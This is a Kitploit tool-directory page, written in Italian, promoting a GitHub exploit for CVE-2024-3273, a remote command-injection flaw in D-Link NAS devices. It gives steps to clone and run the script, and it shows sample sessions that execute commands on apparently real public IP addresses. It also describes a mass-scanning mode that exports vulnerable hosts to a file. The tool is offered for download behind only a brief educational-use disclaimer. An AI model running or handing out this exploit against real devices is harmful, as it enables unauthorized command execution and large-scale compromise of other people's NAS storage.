Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3273 — Exploit per CVE-2024-3273, supporta host singoli e multipli | Kitploit
Strumenti/GitHubGitHub/adhikara13/cve-2024-3273
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

Exploit per CVE-2024-3273, supporta host singoli e multipli

Vedi Repository
1312 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3273 Prova di Concetto (PoC)

Questo repository contiene una Prova di Concetto (PoC) per CVE-2024-3273, una vulnerabilità di sicurezza scoperta nei dispositivi D-Link NAS. La vulnerabilità consente agli attaccanti di eseguire comandi arbitrari sui dispositivi vulnerabili.

Descrizione

CVE-2024-3273 è una vulnerabilità nei dispositivi D-Link NAS che consente a un attaccante remoto di eseguire comandi arbitrari tramite una richiesta HTTP manipolata all'endpoint cgi-bin/nas_sharing.cgi.

Questa PoC dimostra come la vulnerabilità possa essere sfruttata per eseguire comandi sui dispositivi D-Link NAS vulnerabili.

Requisiti

  • Python 3.x
  • libreria requests

Utilizzo

  1. Clona questo repository:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. Naviga nella directory del repository:

    root@kitploit:~
    cd CVE-2024-3273
    
  3. Esegui la PoC:

    root@kitploit:~
    python main.py
    
  4. Segui le istruzioni a schermo per scegliere il dispositivo target:

    • Opzione 1: Singolo host (1): Inserisci i dettagli per un singolo dispositivo target, inclusi l'indirizzo IP dell'host e il comando da eseguire.
    • Opzione 2: Host multipli (2): Fornisci un file contenente più dispositivi target nel formato host:port, e scegli se esportare gli host vulnerabili in vulnerables.txt.

Esempio

root@kitploit:~
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi

┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.

Dichiarazione di non responsabilità

Questa PoC è solo a scopo educativo e di ricerca. Usala responsabilmente e solo su dispositivi che sei autorizzato a testare.

Contributi

I contributi sono benvenuti! Se trovi problemi o miglioramenti, sentiti libero di aprire un issue o creare una pull request.

Scarica lo strumento